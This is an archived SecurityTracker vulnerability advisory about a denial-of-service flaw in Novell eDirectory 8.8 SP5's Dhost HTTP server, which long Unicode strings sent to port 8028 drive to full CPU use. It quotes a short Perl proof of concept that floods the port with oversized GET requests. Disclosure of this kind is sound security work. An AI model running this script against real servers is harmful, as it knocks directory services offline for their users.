SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Directory)  >   Novell eDirectory Vendors:   Novell
Novell eDirectory HTTP Request Processing Flaw Lets Remote Users Deny Service
SecurityTracker Alert ID:  1022849
SecurityTracker URL:  http://securitytracker.com/id/1022849
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 8 2009
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 8.8 SP5
Description:   A vulnerability was reported in Novell eDirectory. A remote user can cause denial of service conditions.

A remote user can send a specially crafted request containing Unicode strings to the Dhost HTTP server to cause the target service to consume all available CPU resources.

Hellcode Research reported this vulnerability.

The original advisory is available at:

http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Impact:   A remote user can cause the target service to consume excessive CPU resources on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.novell.com/ (Links to External Site)
Cause:   Not specified

Message History:   None.


 Source Message Contents

Subject:  Novell eDirectory 8.8 SP5 Dhost Http Server DoS

Affected Software:
Novell eDirectory 8.8 SP5

Vulnerability Description:
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.
If a remote attacker sends Unicode strings with Http Request to "8028 port" 
("8028" is the default port of Novell eDirectory Dhost Http Server), 
the attacker can cause the system to consume 100% of the CPU resources.

Credits to:
Hellcode Research

Original Advisory: 
http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Exploit:

	- snip-
....

$data = "?" x 500000;

for($i= 0; $i < 1000; $i++)
{
	$sock= new IO::Socket::INET( PeerAddr => "localhost",
	PeerPort => 8028,

	Proto => 'tcp',
	Type => SOCK_STREAM, 

	);
	
	print $sock "GET /$data HTTP/1.0\r\n\r\n";
	
	close($sock);
}

...
	- snip -

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC